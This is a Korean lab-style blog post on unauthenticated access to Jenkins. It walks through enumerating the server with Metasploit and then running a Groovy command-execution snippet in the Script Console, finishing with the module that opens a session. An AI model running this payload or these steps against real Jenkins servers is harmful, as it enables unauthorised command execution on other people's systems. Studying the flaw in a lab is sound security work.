1. 취약점 이해
인증값 오류에 따른 취약점
Jenkins : 프로젝트 / 버전 관리 서비스
Jenkins 서비스 포트 접속 시 Manage를 통해 Jenkins CLI를 이용한 공격 코드 삽입이 가능
이에 대해서 metasploit에서 스캔해 보면 jenkins_enum 모듈을 사용할 수 있다.
옵션에서 요구하는 것들 set 해주고 exploit 하면
아래처럼 인증이 필요 없이 사용할 수 있는 서비스들이 나온다.
2. 취약점 실습
위에서 확인한 대로 인증이 필요하지 않은 서비스 중 Manage Jenkins - Script Console을 이용해 공격 진행
아래 공격 코드를 이용하여 다양한 시스템 해킹 명령어 사용 가능
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = "cmd.exe /c dir".execute()
proc.consumeProcessOutput(sout,serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
디렉토리 정보 확인
IP 정보 확인
Process 정보 확인
metasploit으로 진행하면 jenkins_script_console 모듈을 사용할 수 있다.
show options로 채워야 할 옵션들을 채우면
exploit 할 수 있고, session이 맺어진다.
'Security Project' 카테고리의 다른 글
| 31. 관리자 쿠키정보 미흡 / 취약한 관리자 페이지 (0) | 2022.12.31 |
|---|---|
| 30. 인증 및 세션 처리 미흡 이해 (0) | 2022.10.14 |
| 28. MSFV3 ElasticSearch 취약점 분석 (0) | 2022.09.22 |
| 27. PHP_CGI 취약점 이해 및 실습 (0) | 2022.09.21 |
| 26. Shellshock 취약점 이해 및 실습 (1) | 2022.09.19 |
댓글